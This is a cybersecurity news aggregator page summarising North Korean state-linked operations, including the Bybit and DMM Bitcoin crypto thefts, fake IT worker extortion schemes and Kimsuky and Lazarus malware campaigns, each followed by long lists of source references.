Oluwapelumi Adejumo@CryptoSlate - 10d
Cryptocurrency exchange Bybit has confirmed a record-breaking theft of approximately $1.46 billion in digital assets from one of its offline Ethereum wallets. The attack, which occurred on Friday, is believed to be the largest crypto heist on record. Bybit disclosed that a highly sophisticated attack resulted in the theft of more than Rs 11,972 crores in digital assets.
The theft targeted an Ethereum cold wallet, involving a manipulation of a transaction from the cold wallet to a warm wallet. This allowed the attacker to gain control and transfer the funds to an unidentified address. The incident highlights the rising trend of cryptocurrency heists, driven by the allure of profits and challenges in tracing such crimes.
Recommended read:
References :
- www.techmeme.com: ZachXBT: crypto exchange Bybit has experienced $1.46B worth of "suspicious outflows"; Bybit CEO confirms hacker took control of cold ETH wallet
- CryptoSlate: The crypto exchange ByBit has been hacked, and roughly $1.5 billion in Ethereum (ETH) has been stolen — making this one of the biggest hacks in history.
- infosec.exchange: NEW: Crypto exchange Bybit said it was hacked and suffered a loss of around $1.4 billion (~401,346 ETH) at the time of the hack.
- PCMag UK security: The Bybit exchange lost 400,000 in ETH, or about $1.4 billion, before the price began to slide, making it the biggest crypto-related hack in history.
- techcrunch.com: TechCrunch reports on the Bybit hack, disclosing a loss of approximately $1.4 billion in Ethereum.
- ciso2ciso.com: In a major cybersecurity incident, Bybit, the world’s 2nd-largest crypto exchange suffered a $1.4 billion ETH hack from a cold wallet breach.
- ciso2ciso.com: Bybit Hack: $1.4B Stolen from World’s 2nd Largest Crypto Exchange – Source:hackread.com
- cryptoslate.com: ByBit suffers $1.5 billion Ethereum heist in cold wallet breach
- www.coindesk.com: Bybit experiences USD1.46B in suspicious outflows
- BleepingComputer: Cryptocurrency exchange Bybit revealed today that an unknown attacker stole over $1.46 billion worth of cryptocurrency from one of its ETH cold wallets.
- The Cryptonomist: 3 Best Bybit Alternatives As Top CEX Is Hacked
- Gulf Business: ‘Worst hack in history’: Dubai crypto exchange Bybit suffers $1.5bn ether heist
- Anonymous ???????? :af:: Cryptocurrency exchange Bybit revealed today that an unknown attacker stole over $1.46 billion worth of cryptocurrency from one of its ETH cold wallets.
- www.bleepingcomputer.com: Hacker steals record $1.46 billion in ETH from Bybit cold wallet
- Techmeme: Bybit Loses $1.5B in Hack but Can Cover Loss, CEO Confirms (Oliver Knight/CoinDesk)
- Report Boom: Report on the Bybit crypto heist, detailing the incident and security recommendations.
- thehackernews.com: Report on the Bybit hack, highlighting the scale of the theft and its implications.
- reportboom.com: Reportboom article about Bybit's $1.46B Crypto Heist.
- www.it-daily.net: Bybit hacked: record theft of 1.5 billion US dollars
- Protos: News about the Bybit cryptocurrency exchange being hacked for over \$1.4 billion.
- The420.in: On Friday, cryptocurrency exchange Bybit disclosed that a highly sophisticated attack resulted in the theft of more than Rs 11,972 crores in digital assets from one of its offline Ethereum wallets—the largest crypto heist on record.
- TechSpot: The hackers stole the crypto from Bybit's cold wallet, an offline storage system.
- Talkback Resources: Crypto exchange Bybit was targeted in a $1.46 billion theft by the Lazarus Group, highlighting the rising trend of cryptocurrency heists driven by the allure of profits and challenges in tracing such crimes.
- www.bleepingcomputer.com: Cryptocurrency exchange Bybit revealed today that an unknown attacker stole over $1.46 billion worth of cryptocurrency from one of its ETH cold wallets.
- www.the420.in: The420.in: Biggest Crypto Heist Ever: Bybit Loses Rs 12,000+ Crore in Sophisticated Ethereum Wallet Attack!
- www.cnbc.com: This report discusses the Bybit hack, detailing the amount stolen and the potential impact on the crypto market.
- www.engadget.com: This news piece reports on the massive crypto heist from Bybit, highlighting the scale of the incident and the impact on the crypto market.
- Techmeme: Arkham says ZachXBT submitted proof that North Korea's Lazarus Group is behind Bybit's $1.5B hack, which is the largest single theft in crypto history
- BrianKrebs: Infosec exchange post describing Bybit breach.
- Talkback Resources: Bybit cryptocurrency exchange suffered a cyberattack resulting in the theft of $1.5 billion worth of digital currency, including over 400,000 ETH and stETH, with potential vulnerabilities in the Safe.global platform's user interface exploited.
- securityaffairs.com: SecurityAffairs reports Lazarus APT stole $1.5B from Bybit, it is the largest cryptocurrency heist ever.
- gulfbusiness.com: ‘Worst hack in history’: Dubai crypto exchange Bybit suffers $1.5bn ether heist
- techcrunch.com: Crypto exchange Bybit says it was hacked and lost around $1.4B
- Tekedia: The cryptocurrency industry has been rocked by what is now considered the largest digital asset theft in history, as Bybit, a leading crypto exchange, confirmed on Friday that hackers stole approximately $1.4 billion worth of Ethereum (ETH) from one of its offline wallets.
- blog.checkpoint.com: What the Bybit Hack Means for Crypto Security and the Future of Multisig Protection
- Dan Goodin: Crypto exchange Bybit said it was hacked and suffered a loss of around $1.4 billion (~401,346 ETH) at the time of the hack.
- BleepingComputer: Crypto exchange Bybit revealed today that an unknown attacker stole over $1.46 billion worth of cryptocurrency from one of its ETH cold wallets.
- Security Boulevard: North Korea’s Lazarus Group Hacks Bybit, Steals $1.5 Billion in Crypto
- bsky.app: Elliptic is following the money on this ByBit hack - the biggest theft ot all time. “Within 2 hours of the theft, the stolen funds were sent to 50 different wallets, each holding approximately 10,000 ETH. These are now being systematically emptied�.
- Talkback Resources: Talkback Post about the $1.5B Bybit Hack: The Era of Operational Security Failures Has Arrived
- infosec.exchange: Reports that North Korean hackers stole $1.4 billion in crypto from Bybit.
- securityboulevard.com: North Korea's notorious Lazarus Group reportedly stole $1.5 billion in cryptocurrency from the Bybit exchange in what is being called the largest hack in the controversial market's history.
- billatnapier.medium.com: One of the Largest Hacks Ever? But Will The Hackers Be Able To Launder The Gains?
- thecyberexpress.com: thecyberexpress.com - Details on Bybit Cyberattack.
- Matthew Rosenquist: This may turn out to be the biggest hack in history! $1.5 BILLION.
- PCMag UK security: The $1.4 billion at Bybit—the largest known cryptocurrency heist in history—has been traced to the notorious Lazarus North Korean hacking group.
- www.nbcnews.com: Hackers steal $1.5 billion from exchange Bybit in biggest-ever crypto heist: Blockchain analysis firm Elliptic later linked the attack to North Korea’s Lazarus Group, a state-sponsored hacking collective
- www.pcmag.com: Researchers spot the $1.4 billion stolen from Bybit moving through cryptocurrency wallets that were used in earlier heists attributed to North Korea's Lazarus hacking group.
- siliconangle.com: $1.5B in cryptocurrency stolen from Bybit in attack linked to North Korean hackers
- www.americanbanker.com: Nearly $1.5 billion in tokens lost in Bybit crypto exchange hack
- SiliconANGLE: SiliconAngle reports on the details of the Bybit hack and links it to North Korean hackers.
- techcrunch.com: TechCrunch reports on the massive crypto heist, citing research that points to North Korean hackers as perpetrators.
- OODAloop: Reports that North Korea’s Lazarus Group APT is Behind Largest Crypto Heist Ever
- Be3: Looming Shadows: $1.5 Billion Crypto Heist Shakes Confidence in Security Measures
- Schneier on Security: Schneier on Security covers the North Korean Hackers Stealing $1.5B in Cryptocurrency.
- Dataconomy: How the Bybit hack shook the crypto world: $1.5B gone overnight
- be3.sk: Looming Shadows: $1.5 Billion Crypto Heist Shakes Confidence in Security Measures
- Risky Business: Risky Business #781 -- How Bybit oopsied $1.4bn
- cyberriskleaders.com: Bybit, a leading exchange, was hacked for USD1.4 billion in Ethereum and staked Ethereum, sending shockwaves through the digital asset community.
- www.csoonline.com: Independent investigation finds connections to the Lazarus Group.
- Cybercrime Magazine: Bybit suffers the largest crypto hack in history
- www.theguardian.com: Cyberattackers believed to be affiliated with the state-sponsored threat group pulled off the largest crypto heist reported to date, stealing $1.5 billion from exchange Bybit.
- bsky.app: Forensic investigators have discovered that North Korean Lazarus hackers stole $1.5 billion from Bybit after first breaching a Safe{Wallet} developer machine. The multisig wallet platform has also confirmed these findings in a statement issued today.
- Sergiu Gatlan: Forensic investigators have discovered that North Korean Lazarus hackers stole $1.5 billion from Bybit after first breaching a Safe{Wallet} developer machine. The multisig wallet platform has also confirmed these findings in a statement issued today.
- SecureWorld News: SecureWorld reports on the Bybit hack, attributing it to the Lazarus Group.
- OODAloop: The Largest Theft in History – Following the Money Trail from the Bybit Hack
- gbhackers.com: Researchers Uncover $1.4B in Sensitive Data Tied to ByBit Hack by Lazarus Group
- Secure Bulletin: The Lazarus Group, a notorious North Korean state-sponsored hacking collective, has once again demonstrated its sophistication and audacity with a staggering $1.5 billion cryptocurrency heist targeting Bybit, a major crypto exchange.
- Talkback Resources: "
THN Weekly Recap: From $1.5B Crypto Heist to AI Misuse & Apple’s Data Dilemma [mal]
- infosec.exchange: NEW: Hacked crypto exchange Bybit is offering $140 million in bounties to anyone who can help locate and freeze the stolen ethereum.
- CyberInsider: Record $1.5 billion Bybit hack undermines trust in crypto security
- The Register - Security: Cryptocurrency exchange Bybit, just days after suspected North Korean operatives stole $1.5 billion in Ethereum from it, has launched a bounty program to help recover its funds.
- PCMag UK security: The malicious Javascript code used in the attack could secretly modify transactions for Safe{Wallet}, a cryptocurrency wallet provider. The suspected North Korean hackers who $1.4 billion in cryptocurrency from Bybit pulled off the heist by infiltrating a digital wallet provider and tampering with its software.
- techcrunch.com: Last week, hackers stole around $1.4 billion in Ethereum cryptocurrency from crypto exchange Bybit, believed to be the largest crypto heist in history. Now the company is offering a total of $140 million in bounties for anyone who can help trace and freeze the stolen funds. Bybit’s CEO and
- securityaffairs.com: The FBI confirmed that North Korea is responsible for the record-breaking cyber heist at the crypto exchange Bybit.
- The Register - Security: The FBI has officially accused North Korea's Lazarus Group of stealing $1.5 billion in Ethereum from crypto-exchange Bybit earlier this month, and asked for help tracking down the stolen funds.
- techcrunch.com: The FBI said the North Korean government is ‘responsible’ for the hack at crypto exchange Bybit, which resulted in the theft of more than $1.4 billion in Ethereum cryptocurrency.
- Talkback Resources: FBI Says North Korea Hacked Bybit as Details of $1.5B Heist Emerge [net] [mal]
- PCMag UK security: FBI Blames North Korea for Massive $1.4 Billion Cryptocurrency Heist
- The420.in: Rs 1.27 trillion Stolen: Bybit Joins the Ranks of Crypto’s Largest Thefts – Full List Inside
- Talkback Resources: Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers [mal]
- Tekedia: Bybit Declares War on “Notorious� Lazarus Group After $1.4B Hack, Offers $140m Reward
- SecureWorld News: The FBI officially attributed the massive to North Korea's state-sponsored hacking group, TraderTraitor, more commonly known as the infamous Lazarus Group.
- ChinaTechNews.com: North Korea was behind the theft of approximately $1.5bn in virtual assets from a cryptocurrency exchange, the FBI has said, in what is being described as the biggest heist in history.
- Wallarm: Lab Wallarm discusses how Bybit’s Real-Time Blacklisting Is Thwarting a $1.5B Crypto Heist
- iHLS: Cryptocurrency exchange Bybit became the latest victim of a major cyberattack, marking what appears to be the largest crypto hack in history.
- thehackernews.com: Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers
- www.pcmag.com: FBI Blames North Korea for Massive $1.4 Billion Cryptocurrency Heist
- Dan Goodin: InfoSec Exchange Post on the FBI attribution to the Lazarus group and Bybit hack
@ofac.treasury.gov - 38d
North Korean IT workers are increasingly engaging in aggressive extortion tactics against companies that unknowingly hired them. The FBI and Mandiant have issued warnings about these workers, who exploit remote access to steal sensitive data and demand ransom payments. After being discovered, some of these workers hold stolen data and proprietary code hostage, threatening to publicly release it if demands are not met. There have also been reports of workers attempting to steal code repositories, company credentials, and session cookies for further compromise.
This escalation in tactics is attributed to increased law enforcement action, sanctions, and media coverage, which have impacted the success of their schemes. The US Department of Justice has indicted several individuals, including North Korean nationals, for their involvement in elaborate "laptop farm" schemes. These schemes involve using stolen identities, forged documents and remote access software to deceive companies into hiring North Korean IT workers and generating revenue for the DPRK regime. The indicted individuals are accused of generating over $800,000, which was then laundered, highlighting the sophistication and reach of this cybercrime operation.
Recommended read:
References :
- ciso2ciso.com: North Korean Fake IT Workers More Aggressively Extorting Enterprises
- Cyber Security News: North Korean IT Workers Demands Ransomware By Stealing Companies Source Codes
- securityonline.info: North Korean IT Workers Indicted in Elaborate “Laptop Farm� Scheme to Evade Sanctions
- www.justice.gov: This highlights the evolving cybercrime tactics of North Korea
- ciso2ciso.com: North Korean Fake IT Workers More Aggressively Extorting Enterprises
- cybersecuritynews.com: North Korean IT Workers Demands Ransomware By Stealing Companies Source Codes
- www.bleepingcomputer.com: The FBI warns that North Korean IT workers are abusing their access to steal source code and extort US companies that have been tricked into hiring them.
- Techmeme: The FBI warns that North Korean IT workers are abusing their access to steal source code and extort US companies that have been tricked into hiring them (Sergiu Gatlan/BleepingComputer)
- oodaloop.com: DoJ nabs five suspects in North Korean remote worker scheme
- www.computerworld.com: DOJ indicts North Korean conspirators for remote IT work scheme
- CSO Online: DOJ indicts North Korean conspirators for remote IT work scheme
- The420.in: FBI Warns: North Korean Hackers Stealing Source Code to Extort Employers
- ciso2ciso.com: DOJ indicts North Korean conspirators for remote IT work scheme
- www.the420.in: FBI Warns: North Korean Hackers Stealing Source Code to Extort Employers
- : DOJ indicts North Korean conspirators for remote IT work scheme – Source: www.computerworld.com
- Techmeme: The FBI warns that North Korean IT workers are abusing their access to steal source code and extort US companies that have been tricked into hiring them (Sergiu Gatlan/BleepingComputer)
- ciso2ciso.com: US Charges Five People Over North Korean IT Worker Scheme – Source: www.securityweek.com
- www.helpnetsecurity.com: North Korean IT workers are extorting employers, FBI warns
- The Register: North Korean dev who renamed himself 'Bane' accused of IT worker fraud scheme
- The Register - Security: North Korean dev who renamed himself 'Bane' accused of IT worker fraud scheme
- ciso2ciso.com: North Korean dev who renamed himself ‘Bane’ accused of IT worker fraud scheme – Source: go.theregister.com
- Techmeme: The FBI warns that North Korean IT workers are abusing their access to steal source code and extort US companies that have been tricked into hiring them (Sergiu Gatlan/BleepingComputer)
- Help Net Security: North Korean IT workers are extorting employers, FBI warns
info@thehackernews.com (The Hacker News)@The Hacker News - 69d
The North Korean hacking group known as TraderTraitor, also identified as Jade Sleet, UNC4899, and Slow Pisces, has been linked to the theft of $308 million in cryptocurrency from the Japanese exchange DMM Bitcoin in May. This group, a cryptocurrency-focused element within North Korea's Reconnaissance General Bureau, primarily targets blockchain-related companies. Authorities, including the FBI, the Department of Defense Cyber Crime Center, and the National Police Agency of Japan, confirmed the group's involvement, highlighting TraderTraitor's use of targeted social engineering techniques to infiltrate their victims. The group's known methods also include supply chain attacks and malware deployment.
The FBI outlined the attack chain, which began in March when TraderTraitor members posed as recruiters and contacted an employee at a cryptocurrency wallet software company named Ginco. This led to the deployment of a malicious python script. By exploiting the compromised employee's access, the hackers manipulated a legitimate DMM transaction request, resulting in the theft of 4,502.9 Bitcoin, valued at $308 million at the time. The stolen funds were then moved to TraderTraitor-controlled wallets. This incident led DMM Bitcoin to restrict its services following the hack, until the completion of investigations.
Recommended read:
References :
- The Hacker News: The Hacker News reports on North Korean hackers stealing $308M in Bitcoin from DMM Bitcoin.
- www.bleepingcomputer.com: The North Korean hacker group 'TraderTraitor' stole $308 million worth of cryptocurrency in the attack on the Japanese exchange DMM Bitcoin in May.
- www.coindesk.com: US and Japanese law enforcement say North Korean hackers were responsible for stealing 4,502.9 bitcoin, worth $308M, from Japanese exchange DMM in May 2024 (Sheldon Reback/CoinDesk)
- BleepingComputer: The North Korean hacker group 'TraderTraitor' stole $308 million worth of cryptocurrency in the attack on the Japanese exchange DMM Bitcoin in May.
- : FBI : This is not much of a cybersecurity advisory: The Federal Bureau of Investigation, Department of Defense Cyber Crime Center (DC3), and National Police Agency of Japan linked the theft of cryptocurrency worth $308 million U.S. dollars from the Japan-based cryptocurrency company DMM to North Korea's . They also confirmed different private industry threat actor names: , , and . TraderTraitor is a cryptocurrency-focused element within the Reconnaissance General Bureau (RGB), that primarily targets blockchain-related companies (and related vendors).
- COINOTAG NEWS: Coinotag reports about the 48.2 Billion Yen Bitcoin theft linked to North Korea.
- ciso2ciso.com: US and Japan Blame North Korea for $308m Crypto Heist
- www.techmeme.com: US and Japanese law enforcement say North Korean hackers were responsible for stealing 4,502.9 bitcoin, worth $308M, from Japanese exchange DMM in May 2024 (Sheldon Reback/CoinDesk)
- securityonline.info: North Korean Cyber Actors TraderTraitor Steal $308 Million in Cryptocurrency: DMM Breach Unveiled
- Techmeme: US and Japanese law enforcement say North Korean hackers were responsible for stealing 4,502.9 bitcoin, worth $308M, from Japanese exchange DMM in May 2024 (Sheldon Reback/CoinDesk)
- Techmeme: US and Japanese law enforcement say North Korean hackers were responsible for stealing 4,502.9 bitcoin, worth $308M, from Japanese exchange DMM in May 2024 (Sheldon Reback/CoinDesk)
- ciso2ciso.com: FBI Blames North Korea for $308M Cryptocurrency Hack as Losses Surge in 2024
- securityaffairs.com: DMM Bitcoin $308M Bitcoin heist linked to North Korea
- osint10x.com: North Korean Hackers Pull Off $308M Bitcoin Heist from Crypto Firm DMM Bitcoin
- securityonline.info: North Korean Cyber Actors TraderTraitor Steal $308 Million in Cryptocurrency: DMM Breach Unveiled
- ciso2ciso.com: DMM Bitcoin $308M Bitcoin heist linked to North Korea – Source: securityaffairs.com
- www.scworld.com: Suspected Lazarus subgroup behind DMM crypto heist
- Cybernews: A gang of North Korean-affiliated threat actors stole $308 million worth of cryptocurrency from a Japanese crypto company.
- Bitcoin News: FBI Links North Korean Hackers to $308 Million DMM Exchange Breach
- therecord.media: The FBI blamed the theft of $300 million from Japanese crypto platform DMM on hackers from North Korea
Guru Baran@Cyber Security News - 42d
A North Korean IT worker, who adopted the alias 'Bane', is at the center of a fraudulent scheme that targeted numerous US companies. This individual, along with others, is accused of infiltrating these companies to steal confidential source codes, and then demand ransom payments to prevent the release of the stolen data. This is not an isolated incident as it seems the operation has been ongoing since 2018 and ran until around August 2024 with other North Korean nationals involved.
Five individuals have been indicted in connection with this cyber operation. The individuals are accused of creating fake US worker visa documents and setting up staffing companies to secure employment for remote contractors, specifically North Korean IT workers, in positions such as mobile app developers and specialist engineers. These individuals also established US bank accounts and used other payment platforms to launder the money. The scheme successfully deceived at least 64 US companies, with payments made by just ten of these organizations totaling approximately $866,255.
Recommended read:
References :
- ciso2ciso.com: The U.S. has sanctioned North Korean IT worker network supporting WMD programs.
- : The sanctions target organizations and individuals believed to be generating illicit revenue for the North Korean government.
- malware.news: The U.S. has continued its crackdown against North Korean IT worker scams with sanctions against the country's government weapons trading office Department 53 and its Laos-based front companies Korea Osong Shipping and Chonsurim Trading Corporation.
- The Hacker News: The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency.
- ciso2ciso.com: North Korean dev who renamed himself ‘Bane’ accused of IT worker fraud scheme – Source: go.theregister.com
- Cyber Security News: Reporting on the alleged scheme and its impact on businesses.
- The Register: The article details how North Korean individuals pose as IT workers, gaining access to sensitive information and demanding extortion.
- : North Korean dev who renamed himself ‘Bane’ accused of IT worker fraud scheme
- ciso2ciso.com: North Korean dev who renamed himself ‘Bane’ accused of IT worker fraud scheme – Source: go.theregister.com
- go.theregister.com: North Korean developers are engaged in a long-running fraudulent scheme involving remote IT workers.
- www.justice.gov: Indictments issued in connection with the fraudulent remote IT worker scheme. The scheme includes North Korean nationals. The targets include American businesses.
- cybersecuritynews.com: North Korean IT workers masquerading as remote workers have been breaking into Western companies, stealing confidential source codes, and requesting ransoms to prevent their release.
- oodaloop.com: The Department of Justice has arrested several individuals who were involved with a North Korean program to trick companies into hiring North Koreans for remote positions.
- www.bleepingcomputer.com: The FBI warned today that North Korean IT workers are abusing their access to steal source code and extort U.S. companies that have been tricked into hiring them.
- www.computerworld.com: The US Department of Justice this week announced that it had indicted two North Korean nationals and three other men, accusing them of participating in a conspiracy designed to trick US companies into funding the North Korean regime.
- ciso2ciso.com: North Korean Fake IT Workers More Aggressively Extorting Enterprises
- ciso2ciso.com: North Korean Fake IT Workers More Aggressively Extorting Enterprises
- Techmeme: The FBI warns that North Korean IT workers are abusing their access to steal source code and extort US companies that have been tricked into hiring them (Sergiu Gatlan/BleepingComputer)
- www.techmeme.com: The FBI warned today that North Korean IT workers are abusing their access to steal source code and extort U.S. companies that have been tricked into hiring them.
- CSO Online: One recent case saw a bad actor use deepfake video technology and automated voice translation in a video interview, though this didn’t work particularly well and the interviewers were easily able to tell that something was wrong.
- ciso2ciso.com: US Charges Five People Over North Korean IT Worker Scheme – Source: www.securityweek.com
- : DOJ indicts North Korean conspirators for remote IT work scheme
- ciso2ciso.com: News article about North Korean hackers.
- ciso2ciso.com: US Charges Five People Over North Korean IT Worker Scheme – Source: www.securityweek.com
- Help Net Security: The FBI is on a mission to raise awareness about the threat that North Korean IT workers present to organizations in the US and around the world.
- : The FBI warned about North Korean IT workers increasingly exploiting remote access to steal sensitive data and extort companies.
- The Hacker News: The indictment targets individuals including two North Korean nationals, a Mexican national, and two U.S. nationals.
- BleepingComputer: The FBI warned today that North Korean IT workers are abusing their access to steal source code and extort U.S. companies that have been tricked into hiring them.
@gbhackers.com - 19d
North Korean hackers, specifically the Kimsuky APT group (also known as Emerald Sleet), have been observed employing a new tactic to compromise targets. The group is tricking individuals into running PowerShell as an administrator, then instructing them to paste and execute malicious code they provide. The threat actor masquerades as a South Korean government official, building rapport before sending a spear-phishing email with a PDF attachment containing instructions to open PowerShell as an administrator and paste a specific code snippet.
If the target executes the code, it downloads and installs a browser-based remote desktop tool along with a certificate and PIN. The code then sends a web request to register the victim device, granting the threat actor access for data exfiltration. Microsoft Threat Intelligence has observed this tactic in limited attacks since January 2025, describing it as a departure from the threat actor's usual tradecraft.
Recommended read:
References :
- gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
- securityaffairs.com: North Korea-linked APT Emerald Sleet is using a new tactic
- The Hacker News: The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets.
- gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
- BleepingComputer: North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired from the now widespread ClickFix campaigns.
- : Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor.
- www.bleepingcomputer.com: Reports on Emerald Sleet's activity exploiting PowerShell.
- www.microsoft.com: The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
- www.scworld.com: PowerShell exploited in new Kimsuky intrusions
- Talkback Resources: Kimsuky, a North Korean nation-state threat actor, is conducting an ongoing cyber attack campaign named DEEP#DRIVE targeting South Korean business, government, and cryptocurrency sectors using tailored phishing lures and leveraging PowerShell scripts and Dropbox for payload delivery and data exfiltration.
- The Hacker News: North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
- MSSP feed for Latest: Ongoing Kimsuky Attack Campaign Exploits PowerShell, Dropbox
- securityaffairs.com: Analyzing DEEP#DRIVE: North Korean
info@thehackernews.com (The Hacker News)@The Hacker News - 66d
North Korean threat actors are actively using a new malware called ‘OtterCookie’ in their ‘Contagious Interview’ campaign. This campaign is targeting software developers with fake job offers. The malware acts as a backdoor, enabling unauthorized access to compromised systems. This is part of a broader trend of North Korean cyber activity aimed at financial gain and espionage. The activity indicates a sophisticated and persistent threat actor leveraging social engineering to infiltrate targeted systems.
Recommended read:
References :
- Cyber Security News: New ‘OtterCookie’ Malware Targets Developers with Fake Job Offers
- securityonline.info: “OtterCookie” Malware Nibbles at Developers in “Contagious Interview” Campaign
- The Hacker News: North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign
- www.scworld.com: Novel OtterCookie malware added to Contagious Interview attack arsenal
- gbhackers.com: New ‘OtterCookie’ Malware Attacking Software Developers Via Fake Job Offers
- ciso2ciso.com: North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign – Source:thehackernews.com
- securityaffairs.com: North Korea actors use OtterCookie malware in Contagious Interview campaign
- : North Korea actors use OtterCookie malware in Contagious Interview campaign - Source: securityaffairs.com
- ciso2ciso.com: North Korea actors use OtterCookie malware in Contagious Interview campaign – Source: securityaffairs.com
- ciso2ciso.com: North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign – Source:thehackernews.com
- ciso2ciso.com: North Korea actors use OtterCookie malware in Contagious Interview campaign – Source: securityaffairs.com
- www.bleepingcomputer.com: New 'OtterCookie' malware used to backdoor devs in fake job offers
- Hacker News: New 'OtterCookie' malware used to backdoor devs in fake job offers
@Talkback Resources - 17d
Kimsuky, a North Korean advanced persistent threat operation also known as APT43, is actively targeting South Korean entities within the business, government, and cryptocurrency sectors. The hacking group employs a sophisticated attack campaign, named DEEP#DRIVE, that starts with spear-phishing emails designed to establish trust by spoofing a South Korean government official. These emails contain malicious PDF documents and links redirecting victims to websites hosting PowerShell code, ultimately leading to code execution on the targeted systems.
This campaign leverages tailored phishing lures written in Korean and disguised as legitimate documents, such as work logs, insurance documents, and crypto-related files. The attack chain heavily relies on PowerShell scripts for payload delivery, reconnaissance, and execution. Dropbox is utilized for payload distribution and data exfiltration, using OAuth token-based authentication for Dropbox API interactions, which allows for seamless exfiltration of data while bypassing traditional IP or domain blocklists. This makes the threat actors difficult to detect.
Recommended read:
References :
- Talkback Resources: North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
- The Hacker News: North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
- www.scworld.com: PowerShell exploited in new Kimsuky intrusions
- MSSP feed for Latest: PowerShell Exploited in New Kimsuky Intrusions
- MSSP feed for Latest: The Hacker News report on Kimsuky's ongoing attacks using PowerShell and Dropbox.
SC Staff@scmagazine.com - 46d
North Korean state-sponsored hackers have been identified as the perpetrators behind cryptocurrency heists totaling over $659 million in 2024. A joint statement from the United States, Japan, and South Korea warns the blockchain industry about these escalating cyber threats, which target not only exchanges and custodians but also individuals. The attacks have used increasingly sophisticated methods, including fake job postings to infiltrate companies, allowing threat actors to deploy malware and conduct social engineering attacks, with the Lazarus Group being identified as a key player in these operations.
The cyberattacks resulted in major losses for various cryptocurrency exchanges and platforms, including $308 million from DMM Bitcoin, $50 million each from Upbit and Radiant Capital, and $16.13 million from Rain Management. Additionally, the joint statement confirmed North Korea was responsible for a $235 million attack on WazirX, an Indian cryptocurrency exchange, in July 2024. These operations are believed to be aimed at funding North Korea's weapons programs, highlighting the international financial impact of the nation's cyber activities.
Recommended read:
References :
- techcrunch.com: North Korea stole over $659M in crypto heists during 2024, deployed fake job seekers
- www.scworld.com: North Korean crypto heist toll exceeded $659M in 2024
- cryptobriefing.com: US, Japan, and South Korea warn blockchain industry of North Korea’s ongoing cyber threats
- The Verge: North Korea linked to crypto heists of over $650 million in 2024 alone
- : SecurityScorecard : North Korean state-sponsored APT Lazarus (Group) is targeting software developers looking for freelance Web3 and cryptocurrency work in what SecurityScorecard calls Operation 99.
Help Net Security@Help Net Security - 31d
Researchers have uncovered that the Lazarus Group, a North Korean state-sponsored hacking group, is using a web-based administrative panel built with React and Node.js to manage their global cyber operations. This platform gives them a centralized control point for overseeing compromised systems, organizing stolen data, and delivering malicious payloads. The administrative layer, dubbed "Phantom Circuit," is consistent across the group's command-and-control servers, allowing them to orchestrate campaigns with precise control, even while varying their payloads and obfuscation techniques.
This hidden framework is part of a supply chain attack named "Operation Phantom Circuit," where the Lazarus Group targets cryptocurrency entities and software developers by embedding backdoors into legitimate software packages. They trick developers into downloading and running compromised open-source GitHub repositories, which then connect to the group's C2 infrastructure. This approach allows the Lazarus Group to infiltrate companies around the world and exfiltrate sensitive data back to Pyongyang. The operation has claimed over 233 victims, primarily within the cryptocurrency industry, between September 2024 and January 2025, and it is linked to North Korea through the use of Astrill VPNs and six distinct North Korean IP addresses.
Recommended read:
References :
- ciso2ciso.com: The ongoing investigation into recent attacks by the Lazarus Group on cryptocurrency entities and software developers.
- The Hacker News: The Lazarus Group uses React application for C2 control.
- : North Koreans clone open source projects to plant backdoors, steal credentials – Source: go.theregister.com
- gbhackers.com: Reporting on the Lazarus Group's targeting of developers through malicious NPM packages
@securityonline.info - 47d
The United States, Japan, and South Korea have jointly issued a warning to the blockchain industry regarding escalating cyber threats from state-sponsored North Korean hackers. These attacks are not limited to the three nations but extend to the broader international community, with a specific focus on stealing cryptocurrencies from exchanges, custodians, and individual users. The hackers' activities, attributed to groups such as the Lazarus Group, are aimed at generating illicit revenue for the North Korean government's weapons programs.
The scale of these cyber heists is significant, with over $650 million stolen in 2024 alone. Major losses include $308 million from DMM Bitcoin, $50 million from Upbit, and $16.1 million from Rain Management. Furthermore, attacks in 2023 on WazirX ($235 million) and Radiant Capital ($50 million) have also been linked to North Korean cyber actors. The tactics used are becoming increasingly advanced, involving social engineering attacks that deploy malware such as TraderTraitor and AppleJeus. This joint statement underscores the need for enhanced cybersecurity measures and international cooperation to prevent further financial losses.
Recommended read:
References :
- Cybernews: State-sponsored North Korean hackers threaten not only the US, Japan, and South Korea but also the broader international community.
- securityonline.info: Millions Stolen: North Korea Hackers Target Blockchain Industry
- Crypto Briefing: US, Japan, and South Korea warn blockchain industry of North Korea’s ongoing cyber threats
CISO2CISO Editor 2@ciso2ciso.com - 69d
The Lazarus Group, a hacking collective with ties to North Korea, is intensifying its cyber operations against the nuclear industry, employing sophisticated new malware and tactics. Recent attacks have targeted employees within 'nuclear-related' organizations using trojanized virtual network computing (VNC) utilities disguised as job assessment tests. These disguised archives delivered malware via ISO and ZIP files, and they used a modified AmazonVNC.exe, combined with legitimate UltraVNC components to execute attacks. This method allows the group to establish a layered infection chain that helps them to evade detection.
